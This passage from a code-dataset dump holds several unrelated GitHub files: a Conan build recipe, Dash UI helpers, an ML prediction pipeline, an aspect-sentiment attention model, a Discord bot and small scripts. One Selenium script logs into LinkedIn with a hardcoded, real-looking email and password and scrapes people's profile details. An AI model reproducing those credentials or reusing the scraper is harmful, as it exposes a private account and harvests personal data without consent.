ConanInvalidConfiguration(\n "If built as shared, protobuf, and grpc must be shared as well."\n " Please, use `protobuf/*:shared=True`, and `grpc/*:shared=True`.")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], destination=self.source_folder, strip_root=True)\n\n def requirements(self):\n self.requires(\"protobuf/3.21.9\", transitive_headers=True)\n self.requires(\"grpc/1.50.1\", transitive_headers=True)\n self.requires(\"nlohmann_json/3.10.0\")\n self.requires(\"crc32c/1.1.1\")\n self.requires(\"abseil/20220623.0\", transitive_headers=True)\n self.requires(\"libcurl/7.88.1\")\n self.requires(\"openssl/[>=1.1 <4]\")\n self.requires(\"zlib/1.2.13\")\n\n def build_requirements(self):\n # For the grpc-cpp-plugin executable\n self.tool_requires(\"grpc/1.50.1\")\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"BUILD_TESTING\"] = False\n tc.variables[\"GOOGLE_CLOUD_CPP_ENABLE_MACOS_OPENSSL_CHECK\"] = False\n tc.variables[\"GOOGLE_CLOUD_CPP_ENABLE\"] = \",\".join(self._components())\n tc.generate()\n VirtualRunEnv(self).generate(scope=\"build\")\n deps = CMakeDeps(self)\n deps.generate()\n\n def _patch_sources(self):\n apply_conandata_patches(self)\n # This was informed by comments in the grpc port. On macOS `Make` will\n # run commands via `/bin/sh`. `/bin/sh` is subject to System Integrity\n # Protections. In particular, the system will purge the DYLD_LIBRARY_PATH\n # environment variables:\n # https://developer.apple.com/library/archive/documentation/Security/Conceptual/System_Integrity_Protection_Guide/RuntimeProtections/RuntimeProtections.html\n settings_build = getattr(self, \"settings_build\", self.settings)\n if settings_build.os == \"Macos\":\n replace_in_file(self, os.path.join(self.source_folder, \"cmake/CompileProtos.cmake\"),\n \"$<TARGET_FILE:protobuf::protoc>\",\n '${CMAKE_COMMAND} -E env \"DYLD_LIBRARY_PATH=$ENV{DYLD_LIBRARY_PATH}\" $<TARGET_FILE:protobuf::protoc>')\n\n def build(self):\n self._patch_sources()\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def _generate_proto_requires(self, component):\n deps = self._PROTO_COMPONENT_DEPENDENCIES.get(self.version, dict())\n return deps.get(component, [])\n\n _SKIPPED_COMPONENTS = {\n # Some protos do not compile due to inconvenient system macros clashing\n # with proto enum values. Protobuf can work around these problems, but\n # the current version in the Conan index (protobuf/3.21.4) does not contain\n # the fixes for these cases.\n # TODO - review after protobuf >= 4.23.x\n 'asset',\n 'channel',\n 'storagetransfer',\n # TODO - certificatemanager crashes the gRPC code generator. Add it back\n # after gRPC >= 1.53.x\n 'certificatemanager',\n }\n\n def _components(self):\n result = self._GA_COMPONENTS.get(self.version, []).copy()\n for c in self._SKIPPED_COMPONENTS:\n result.remove(c)\n # TODO - these do not build on Android due to conflicts between OS\n # macros and Proto enums. 
Revisit after Protobuf >= 4.23.x\n if self.settings.os == \"Android\":\n result.remove('accesscontextmanager_protos')\n result.remove('talent_protos')\n return result\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, path=os.path.join(self.package_folder, \"lib\", \"cmake\"))\n rmdir(self, path=os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n\n def _add_proto_component(self, component):\n self.cpp_info.components[component].requires = self._generate_proto_requires(component)\n self.cpp_info.components[component].libs = [f\"google_cloud_cpp_{component}\"]\n self.cpp_info.components[component].names[\"pkg_config\"] = f\"google_cloud_cpp_{component}\"\n\n def _add_grpc_component(self, component, protos, extra=None):\n SHARED_REQUIRES=[\"grpc_utils\", \"common\", \"grpc::grpc++\", \"grpc::_grpc\", \"protobuf::libprotobuf\", \"abseil::absl_memory\"]\n self.cpp_info.components[component].requires = (extra or []) + [protos] + SHARED_REQUIRES\n self.cpp_info.components[component].libs = [f\"google_cloud_cpp_{component}\"]\n self.cpp_info.components[component].names[\"pkg_config\"] = f\"google_cloud_cpp_{component}\"\n\n def package_info(self):\n self.cpp_info.components[\"common\"].requires = [\"abseil::absl_any\", \"abseil::absl_flat_hash_map\", \"abseil::absl_memory\", \"abseil::absl_optional\", \"abseil::absl_time\"]\n self.cpp_info.components[\"common\"].libs = [\"google_cloud_cpp_common\"]\n self.cpp_info.components[\"common\"].names[\"pkg_config\"] = \"google_cloud_cpp_common\"\n\n self.cpp_info.components[\"rest_internal\"].requires = [\"common\", \"libcurl::libcurl\", \"openssl::ssl\", \"openssl::crypto\", \"zlib::zlib\"]\n self.cpp_info.components[\"rest_internal\"].libs = [\"google_cloud_cpp_rest_internal\"]\n self.cpp_info.components[\"rest_internal\"].names[\"pkg_config\"] = \"google_cloud_cpp_common\"\n\n # A small number of gRPC-generated stubs are used directly in the common components\n # shared by all gRPC-based libraries. 
These must be defined without reference to `grpc_utils`.\n GRPC_UTILS_REQUIRED_PROTOS={\"iam_protos\", \"longrunning_operations_protos\", \"rpc_error_details_protos\", \"rpc_status_protos\"}\n for component in GRPC_UTILS_REQUIRED_PROTOS:\n self._add_proto_component(component)\n\n self.cpp_info.components[\"grpc_utils\"].requires = list(GRPC_UTILS_REQUIRED_PROTOS) + [\"common\", \"abseil::absl_function_ref\", \"abseil::absl_memory\", \"abseil::absl_time\", \"grpc::grpc++\", \"grpc::_grpc\"]\n self.cpp_info.components[\"grpc_utils\"].libs = [\"google_cloud_cpp_grpc_utils\"]\n self.cpp_info.components[\"grpc_utils\"].names[\"pkg_config\"] = \"google_cloud_cpp_grpc_utils\"\n\n for component in self._proto_components():\n if component not in GRPC_UTILS_REQUIRED_PROTOS:\n self._add_proto_component(component)\n\n # Interface libraries for backwards compatibility\n self.cpp_info.components[\"dialogflow_es_protos\"].requires = [\"cloud_dialogflow_v2_protos\"]\n self.cpp_info.components[\"logging_type_protos\"].requires = [\"logging_type_type_protos\"]\n self.cpp_info.components[\"speech_protos\"].requires = [\"cloud_speech_protos\"]\n self.cpp_info.components[\"texttospeech_protos\"].requires = [\"cloud_texttospeech_protos\"]\n self.cpp_info.components[\"trace_protos\"].requires = [\n \"devtools_cloudtrace_v2_trace_protos\",\n \"devtools_cloudtrace_v2_tracing_protos\",\n ]\n\n for component in self._components():\n # bigquery proto library predates the adoption of more consistent naming\n if component == 'bigquery':\n self._add_proto_component(\"cloud_bigquery_protos\")\n self._add_grpc_component(component, \"cloud_bigquery_protos\")\n continue\n if component == 'dialogflow_es':\n self._add_proto_component(\"cloud_dialogflow_v2_protos\")\n self._add_grpc_component(component, \"cloud_dialogflow_v2_protos\")\n continue\n # `storage` is the only component that does not depend on a matching `*_protos` library\n protos=f\"{component}_protos\"\n if component in self._REQUIRES_CUSTOM_DEPENDENCIES:\n continue\n self._add_grpc_component(component, protos)\n\n self._add_grpc_component(\"bigquery\", \"cloud_bigquery_protos\")\n self._add_grpc_component(\"bigtable\", \"bigtable_protos\")\n self._add_grpc_component(\"iam\", \"iam_protos\")\n self._add_grpc_component(\"pubsub\", \"pubsub_protos\", [\"abseil::absl_flat_hash_map\"])\n self._add_grpc_component(\"spanner\", \"spanner_protos\", [\"abseil::absl_fixed_array\", \"abseil::absl_numeric\", \"abseil::absl_strings\", \"abseil::absl_time\"])\n\n self.cpp_info.components[\"storage\"].requires = [\"rest_internal\", \"common\", \"nlohmann_json::nlohmann_json\", \"abseil::absl_memory\", \"abseil::absl_strings\", \"abseil::absl_str_format\", \"abseil::absl_time\", \"abseil::absl_variant\", \"crc32c::crc32c\", \"libcurl::libcurl\", \"openssl::ssl\", \"openssl::crypto\", \"zlib::zlib\"]\n self.cpp_info.components[\"storage\"].libs = [\"google_cloud_cpp_storage\"]\n self.cpp_info.components[\"storage\"].names[\"pkg_config\"] = \"google_cloud_cpp_storage\"\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/google-cloud-cpp/2.x/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":14283,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"41800307467","text":"import dash_html_components as html\nimport dash_core_components as dcc\n\n\ndef Header(app):\n return html.Div([get_header(app), html.Br([]), get_menu()])\n\n\ndef get_header(app):\n header = html.Div(\n [\n 
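# first row: the site logo\n 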
html.Div(\n [\n html.Img(\n src=app.get_asset_url(\"columbia.jpg\"),\n className=\"logo\",\n )\n ],\n className=\"row\",\n ),\n html.Div(\n [\n html.Div(\n [html.H5(\"Reinforcement Learning for Customer Interaction\")],\n className=\"seven columns main-title\",\n )\n ],\n className=\"twelve columns\",\n style={\"padding-left\": \"0\"},\n ),\n ],\n className=\"row\",\n )\n return header\n\n\ndef get_menu():\n menu = html.Div(\n [\n dcc.Link(\n \"Overview\",\n href=\"/dash-financial-report/overview\",\n className=\"tab first\",\n ),\n dcc.Link(\n \"Direct RL\",\n href=\"/dash-financial-report/DirectRL\",\n className=\"tab\",\n ),\n dcc.Link(\n \"Indirect RL\",\n href=\"/dash-financial-report/IndirectRL\",\n className=\"tab\",\n ),\n dcc.Link(\n \"Semidirect RL\",\n href=\"/dash-financial-report/SemidirectRL\",\n className=\"tab\",\n ),\n ],\n className=\"row all-tabs\",\n )\n return menu\n\n\ndef make_dash_table(df):\n \"\"\" Return a dash definition of an HTML table for a Pandas dataframe \"\"\"\n table = []\n for index, row in df.iterrows():\n html_row = []\n for i in range(len(row)):\n html_row.append(html.Td([row[i]]))\n table.append(html.Tr(html_row))\n return table\n","repo_name":"Sapphirine/202005-16-RL_for_Customer_Interaction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1125853119","text":"# needs to be customized for each model type\nimport os\nimport sys\nimport pandas as pd\nfrom src.exception import CustomException\nfrom src.utils import load_object\n\nclass PredictPipeline:\n def __init__(self):\n pass\n\n def predict(self,data):\n try:\n print('loading model and preprocessor')\n model_path=os.path.join(\"artifacts\",\"model.pkl\")\n preprocessor_path=os.path.join('artifacts','proprocessor.pkl')\n print(\"Before Loading\")\n model=load_object(file_path=model_path)\n preprocessor=load_object(file_path=preprocessor_path)\n print(\"After Loading\")\n data_scaled=preprocessor.transform(data)\n preds=model.predict(data_scaled)\n probs =model.predict_proba(data_scaled)[:,1]\n\n return preds, probs\n \n except Exception as e:\n raise CustomException(e,sys)\n","repo_name":"rjwdata/poc-early-warning","sub_path":"src/pipeline/predict_pipeline.py","file_name":"predict_pipeline.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10954300786","text":"import math\n\nfrom .triangle_class import TriangleClass\n\n\nclass EquilateralTriangleClass(TriangleClass):\n def __init__(self, a_side, b_side, angle):\n super().__init__(a_side, b_side, angle)\n self.a_side = a_side\n\n def perimeter_calculation(self):\n self.perimeter = self.a_side * 3\n\n def area_calculation(self):\n try:\n a = self.a_side\n h = math.sqrt(pow(a, 2) - (pow(a, 2) / 4))\n self.area = (1 / 2) * a * h\n except ValueError:\n self.area = \"Ошибка вычисления\"\n","repo_name":"GeorgiyDemo/FA","sub_path":"Course_I/Алгоритмы Python/Part2/семинары/pract2/задание/modules/task8/equilateral_triangle_class.py","file_name":"equilateral_triangle_class.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"77"} +{"seq_id":"35360399049","text":"from time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\ndriver = 
webdriver.Chrome('/mnt/d/Chrome_Driver/chromedriver.exe')\n #for bash terminal: /mnt/d/Chrome_Driver/chromedriver.exe\n #for cmd terminal: D:\\Chrome_Driver\\chromedriver.exe\nsleep(2)\ndriver.get('https://www.linkedin.com/login?trk=guest_homepage-basic_nav-header-signin')\nsleep(3)\n\n#username authentication\nusername = driver.find_element_by_id('username')\nusername.send_keys('omiakif@gmail.com')\nsleep(0.5)\n\n#password authentication\npassword = driver.find_element_by_id('password')\npassword.send_keys('m911springfieldm911')\nsleep(0.5)\n\n#login\nlog_in_button = driver.find_element_by_xpath('//*[@type=\"submit\"]')\nlog_in_button.click()\nsleep(4)\n\n\ndriver.execute_script(\"window.open('https://www.linkedin.com/search/results/people/?origin=DISCOVER_FROM_SEARCH_HOME');\")\nsleep(3)\n\ndriver.close()\ndriver.switch_to.window(driver.window_handles[-1])\n\n#all_filters = driver.find_element_by_xpath('//*[@id=\"ember272\"]/span')\n#all_filters = driver.find_element_by_link_text('All Filters')\n\nsearch = driver.find_element_by_xpath('//*[@id=\"ember33\"]/input')\nsearch.send_keys('East West University')\nsearch.send_keys(Keys.ENTER)\n\n#//*[@id=\"ember33\"]/input\n# class == search-filters-bar__all-filters flex-shrink-zero mr3 artdeco-button artdeco-button--muted artdeco-button--2 artdeco-button--tertiary ember-view\n\ndef find_odds(num_ber):\n if not num_ber:\n return []\n if num_ber[0]%2 == 1:\n return [num_ber[0]] + find_odds(num_ber[1:])\n return find_odds(num_ber[1:])\n\ndef find_people(li):\n for i in range(len(li)):\n odd_find = find_odds(range(len(linkedin_urls)))\n l = linkedin_urls[odd_find[i-len(li)]].get_attribute('href')\n #l = linkedin_urls[i].get_attribute('href')\n driver.execute_script(\"window.open(arguments[0]);\", l)\n sleep(3)\n driver.switch_to.window(driver.window_handles[-1])\n \n #driver.get(linkedin_urls[i])\n sleep(5)\n \n driver.execute_script(\"window.scrollTo(0,811.495);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(811.495,1622.99);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1622.99,2434.485);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(2434.485,3254.98);\")\n sleep(0.5)\n\n #sel = Selector(text=driver.page_source)\n\n #to match against the provided name\n #re_name = name_1[i]\n\n name_2 = driver.find_element_by_css_selector('li.inline.t-24.t-black.t-normal.break-words')\n name = name_2.get_attribute('innerHTML')\n if name:\n name = name.strip()\n\n wo_rk = driver.find_element_by_css_selector('h2.mt1.inline-block.t-18.t-black.t-normal')\n work = wo_rk.get_attribute('innerHTML')\n if work:\n work = work.strip()\n\n \n #current position/work\n #c_position = current_pos_txt[i]\n #To find if the candidate has any details of his past\n\n if current_pos_txt == \"\":\n print(\"As per work\")\n \n #degree\n\n deg_ree = driver.find_element_by_css_selector('span.pv-entity__comma-item')\n degree = deg_ree.get_attribute('innerHTML')\n if degree:\n degree = degree.strip()\n\n #replaced with innerHTML\n #education = [deg.text for deg in deg_ree] \n\n #degree = sel.css('span.pv-entity__comma-item').extract_first()\n #if degree:\n # degree = degree.strip()\n \n #pv-entity__school-name t-16 t-black t-bold\n\n #university = sel.css('h3.pv-entity__school-name.t-16.t-black.t-bold')\n\n uni_ver = driver.find_element_by_css_selector('h3.pv-entity__school-name.t-16.t-black.t-bold')\n university = uni_ver.get_attribute('innerHTML')\n if university:\n university = university.strip()\n\n #year\n ye_ars = 
driver.find_element_by_tag_name('time') \n years = [y.text for y in ye_ars] \n\n #url of the \n link_url = driver.current_url\n\n print('\\n')\n print('Name: ' + name)\n print('Work: ' + work)\n print('Degree: ' + degree)\n print('Years ' + str(years))\n print('URL ' + link_url)\n\n driver.close()\n driver.switch_to_window(driver.window_handles[-1])\n\n return name, work, degree, years, link_url\n\n\n\n# Find the object to interact with.\n#driver.find_element_by_class_name(\"foo\").click()\n\n# New tabs will be the last object in window_handles\n#driver.switch_to.window(driver.window_handles[-1])\n\n# close the tab\n#driver.close()\n\n#search_query = driver.find_element_by_name('q')\n#search_query.send_keys('site:linkedin.com/in/ AND \"East West University\" AND \"Bangladesh\"')\n#sleep(0.5)\n\n#search_query.submit()\n#sleep(3)\n\n\ncounter = 1\n#driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.HOME)\n\n#actionChains = ActionChains(driver)\n\nwhile True:\n driver.execute_script(\"window.scrollTo(0,557);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(557,1114);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1114,1671);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1671,2229);\")\n sleep(0.5)\n\n li = driver.find_elements_by_class_name('span.name.actor-name')\n\n linkedin_urls = driver.find_elements_by_css_selector('a.search-result__result-link.ember-view')\n current_pos = driver.find_elements_by_css_selector('p.search-result__snippets.mt2.t-12.t-black--light.t-normal')\n \n #name_1 = [url.text for url in linkedin_urls]\n current_pos_txt = [ul.text for ul in current_pos]\n\n\n #f = open('output.html', 'w')\n #driver.page_source = f\n\n\n sleep(5)\n\n #driver.close()\n\n\n #a = driver.page_source\n #file = open('ist.html', 'w', encoding='utf-8')\n #file.write(a)\n #file.close()\n\n counter+=1\n\n driver.get(\"https://www.linkedin.com/search/results/people/?keywords=East%%20West%%20University&origin=GLOBAL_SEARCH_HEADER&page=%d\" % counter)\n\n\n if linkedin_urls[0] == linkedin_urls[-1]:\n break\n\n sleep(0.5)\n\n\nsleep(0.5)\n\ndriver.quit()","repo_name":"omi-akif/My_Codes","sub_path":"Python/Python Projects/lin-in/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36366674177","text":"from .models import Khata_book\n\n\ndef grand_total(datas):\n amount = 0\n for data in datas:\n amount += data.total_amount\n return amount\n\n\ndef getClientList(user=None, client=None):\n user_data = Khata_book.objects.filter(user=user)\n if client is None:\n entries = user_data.values('client_name').distinct()\n all_clients = {}\n for entry in entries:\n # gives arranged lists of same clients\n name = list(entry.values())\n # gives query sets of that particular client, so that we can display it further\n data_sets = user_data.filter(client_name=name[0])\n\n all_clients[data_sets[0]] = grand_total(data_sets)\n # passing the final list of query set to the frontend\n return all_clients\n else:\n entries = user_data.filter(client_name=client).distinct()\n all_clients = {}\n for entry in entries:\n data_sets = user_data.filter(client_name=client)\n all_clients[data_sets[0]] = grand_total(data_sets)\n # passing the final list of query set to the frontend\n return 
all_clients\n","repo_name":"HussainAzad01/khata_book","sub_path":"khata_book/khata_app/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14444193691","text":"# bot.py\nimport os\nimport random\nimport discord\nfrom dotenv import load_dotenv\nfrom search import google_search\nfrom dataBase import get_search_data, post_search_data\nload_dotenv()\n#TOKEN = os.getenv('DISCORD_TOKEN')\nTOKEN = {'DISCORD_TOKEN'}\nGUILD = {'SERVER_NAME'}\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print(f'{client.user.name} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n user_id = message.author.id\n msg = message.content.lower()\n if message.author == client.user:\n return\n\n if msg.startswith('hi'):\n response = 'Hey'\n await message.channel.send(response)\n\n if msg.startswith('!google'):\n msg = msg.split(None, 1)[1]\n post_search_data(user_id, msg)\n response = google_search(msg, user_id)\n if response:\n response = 'Result of search: {}'.format(response)\n\n else:\n response = 'Your search - {} - did not match any documents.'.format(msg)\n await message.channel.send(response)\n\n if msg.startswith('!recent'):\n msg = msg.split(None, 1)[1]\n response = get_search_data(user_id,msg)\n if response:\n response = 'Result of search: {}' .format(response)\n\n else:\n response = 'Your search - {} - did not match any documents.'.format(msg)\n await message.channel.send(response)\n\nclient.run(TOKEN)\n\n","repo_name":"ree12345/DiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12618910402","text":"# !/usr/bin/env python\r\nfrom NeuralLanguageModel import NeuralLanguageModel\r\n# encoding: utf-8\r\n\r\nimport os, sys\r\n\r\nsys.path.append(os.getcwd())\r\n\r\nfrom nn_layer import softmax_layer, bi_dynamic_rnn, reduce_mean_with_len\r\nfrom att_layer import bilinear_attention_layer, dot_produce_attention_layer\r\nfrom config import *\r\nfrom utils import load_w2v, batch_index, load_inputs_twitter\r\nimport numpy as np\r\n\r\ntf.set_random_seed(1)\r\n\r\n'''\r\nCode Code is based on and originally written by Maria Mihaela Trusca (https://github.com/mtrusca/HAABSA_PLUS_PLUS).\r\nAdapted by Kunal Geed\r\n'''\r\nclass LCRRotHopModel(NeuralLanguageModel):\r\n\r\n def lcr_rot(self, input_fw, input_bw, sen_len_fw, sen_len_bw, target, sen_len_tr, keep_prob1, keep_prob2, l2,\r\n _id='all'):\r\n print('I am lcr_rot_altv4_inherited.')\r\n rate=1-keep_prob1\r\n cell = tf.contrib.rnn.LSTMCell\r\n input_fw_orignial = input_fw\r\n input_bw_original = input_bw\r\n # left hidden\r\n input_fw = tf.nn.dropout(input_fw, rate=rate)\r\n hiddens_l = bi_dynamic_rnn(cell, input_fw, FLAGS.n_hidden, sen_len_fw, FLAGS.max_sentence_len, 'l' + _id,\r\n 'all') # Hidden State Left, size = number of left words\r\n pool_l = reduce_mean_with_len(hiddens_l, sen_len_fw)\r\n\r\n # right hidden\r\n input_bw = tf.nn.dropout(input_bw, rate=rate)\r\n hiddens_r = bi_dynamic_rnn(cell, input_bw, FLAGS.n_hidden, sen_len_bw, FLAGS.max_sentence_len, 'r' + _id,\r\n 'all') # Hideen State Right (H_r) size=number of right words\r\n pool_r = reduce_mean_with_len(hiddens_r, sen_len_bw)\r\n\r\n # target hidden\r\n target = tf.nn.dropout(target, rate=rate)\r\n hiddens_t = bi_dynamic_rnn(cell, target, FLAGS.n_hidden, sen_len_tr, 
FLAGS.max_sentence_len, 't' + _id,\r\n 'all') # Hidden State Target (H_t) size= number of target words\r\n pool_t = reduce_mean_with_len(hiddens_t, sen_len_tr)\r\n\r\n # attention left\r\n att_l = bilinear_attention_layer(hiddens_l, pool_t, sen_len_fw, 2 * FLAGS.n_hidden, l2, FLAGS.random_base,\r\n 'tl') # Attention Score left, size = 1 x number of left words\r\n weighted_hidden_states_left = tf.multiply(tf.transpose(att_l, perm=[0, 2, 1]),\r\n hiddens_l) # multiplied by the first attention score\r\n\r\n outputs_t_l_init = tf.matmul(att_l, hiddens_l)\r\n outputs_t_l = tf.squeeze(outputs_t_l_init)\r\n # attention right\r\n att_r = bilinear_attention_layer(hiddens_r, pool_t, sen_len_bw, 2 * FLAGS.n_hidden, l2, FLAGS.random_base,\r\n 'tr') # Attention Score right size= 1 x number of right words\r\n weighted_hidden_states_right = tf.multiply(tf.transpose(att_r, perm=[0, 2, 1]),\r\n hiddens_r) # multiplied by the first attention score at word level (not summed)\r\n\r\n outputs_t_r_init = tf.matmul(att_r, hiddens_r)\r\n outputs_t_r = tf.squeeze(outputs_t_r_init)\r\n\r\n # attention target left\r\n att_t_l = bilinear_attention_layer(hiddens_t, outputs_t_l, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base,\r\n 'l') # Attention Score target left, size= 1 x number of target words.\r\n outputs_l_init = tf.matmul(att_t_l, hiddens_t)\r\n outputs_l = tf.squeeze(outputs_l_init)\r\n # attention target right\r\n att_t_r = bilinear_attention_layer(hiddens_t, outputs_t_r, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base,\r\n 'r') # Attention Score target right size= 1 x number of target words.\r\n outputs_r_init = tf.matmul(att_t_r, hiddens_t) # The hidden state times the attention score\r\n outputs_r = tf.squeeze(outputs_r_init)\r\n\r\n outputs_init_context = tf.concat([outputs_t_l_init, outputs_t_r_init], 1)\r\n outputs_init_target = tf.concat([outputs_l_init, outputs_r_init], 1)\r\n att_outputs_context = dot_produce_attention_layer(outputs_init_context, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin1') # alpha context\r\n att_outputs_target = dot_produce_attention_layer(outputs_init_target, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin2') # alpha target\r\n outputs_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 0], 2), outputs_l_init))\r\n outputs_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 1], 2), outputs_r_init))\r\n outputs_t_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 0], 2), outputs_t_l_init))\r\n outputs_t_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 1], 2), outputs_t_r_init))\r\n\r\n hierarchical_weighted_states_left = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 0], 2),\r\n weighted_hidden_states_left)\r\n hierarchical_weighted_states_right = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 1], 2),\r\n weighted_hidden_states_right)\r\n layer_information = {\r\n 'embedding_left': input_fw_orignial,\r\n 'embedding_right': input_bw_original,\r\n 'left_hidden_state': hiddens_l,\r\n 'right_hidden_state': hiddens_r,\r\n 'weighted_states_left_initial': hierarchical_weighted_states_left,\r\n 'weighted_states_right_initial': hierarchical_weighted_states_right\r\n }\r\n\r\n for i in range(2):\r\n # attention target\r\n att_l = bilinear_attention_layer(hiddens_l, outputs_l, sen_len_fw, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'tl' + str(i))\r\n outputs_t_l_init = tf.matmul(att_l, hiddens_l)\r\n outputs_t_l = tf.squeeze(outputs_t_l_init)\r\n\r\n att_r = 
bilinear_attention_layer(hiddens_r, outputs_r, sen_len_bw, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'tr' + str(i))\r\n outputs_t_r_init = tf.matmul(att_r, hiddens_r)\r\n outputs_t_r = tf.squeeze(outputs_t_r_init)\r\n\r\n # attention left\r\n att_t_l = bilinear_attention_layer(hiddens_t, outputs_t_l, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'l' + str(i))\r\n outputs_l_init = tf.matmul(att_t_l, hiddens_t)\r\n outputs_l = tf.squeeze(outputs_l_init)\r\n weighted_hidden_states_left = tf.multiply(tf.transpose(att_l, perm=[0, 2, 1]),\r\n hiddens_l) # multiplied by the first attention score\r\n\r\n # attention right\r\n att_t_r = bilinear_attention_layer(hiddens_t, outputs_t_r, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'r' + str(i))\r\n outputs_r_init = tf.matmul(att_t_r, hiddens_t)\r\n outputs_r = tf.squeeze(outputs_r_init)\r\n weighted_hidden_states_right = tf.multiply(tf.transpose(att_r, perm=[0, 2, 1]),\r\n hiddens_r) # multiplied by the first attention score at word level (not summed)\r\n\r\n outputs_init_context = tf.concat([outputs_t_l_init, outputs_t_r_init], 1)\r\n outputs_init_target = tf.concat([outputs_l_init, outputs_r_init], 1)\r\n att_outputs_context = dot_produce_attention_layer(outputs_init_context, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin1' + str(i)) # alpha for target\r\n att_outputs_target = dot_produce_attention_layer(outputs_init_target, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin2' + str(i)) # alpha for context\r\n outputs_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 0], 2), outputs_l_init))\r\n outputs_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 1], 2), outputs_r_init))\r\n outputs_t_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 0], 2), outputs_t_l_init))\r\n outputs_t_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 1], 2), outputs_t_r_init))\r\n hierarchical_weighted_states_left = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 0], 2),\r\n weighted_hidden_states_left)\r\n hierarchical_weighted_states_right = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 1], 2),\r\n weighted_hidden_states_right)\r\n layer_information['weighted_states_left_' + str(i)] = hierarchical_weighted_states_left\r\n layer_information['weighted_states_right_' + str(i)] = hierarchical_weighted_states_right\r\n\r\n outputs_fin = tf.concat([outputs_l, outputs_r, outputs_t_l, outputs_t_r], 1)\r\n prob = softmax_layer(outputs_fin, 8 * FLAGS.n_hidden, FLAGS.random_base, keep_prob2, l2, FLAGS.n_class)\r\n return prob, att_l, att_r, att_t_l, att_t_r, layer_information\r\n","repo_name":"KunalGeed/DC-LCR-Rot-hop_plus_plus","sub_path":"lcr_v4.py","file_name":"lcr_v4.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74898045687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 24 09:59:14 2015\n\n@author: usuario\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef inversion(x, y):\n z = [s+t*1.0J for s,t in zip(x,y)]\n zp = [4.0/s.conjugate() for s in z if s != 0]\n xp = [s.real for s in zp]\n yp = [s.imag for s in zp]\n return xp, yp\n \n\nM = np.random.random((3,3))\nM[:,[0,1]] = 10*M[:, [0,1]] - 5\nM[:, 2] = 10*M[:,2]\n\ntheta = np.linspace(0,2*np.pi, 50)\n\nfor i in range(3):\n x0, y0, r = M[i,:]\n x = r*np.cos(theta) + x0\n y = r*np.sin(theta) + y0\n xp, yp = inversion(x, y)\n plt.plot(x, y, xp, yp, '*')\n 
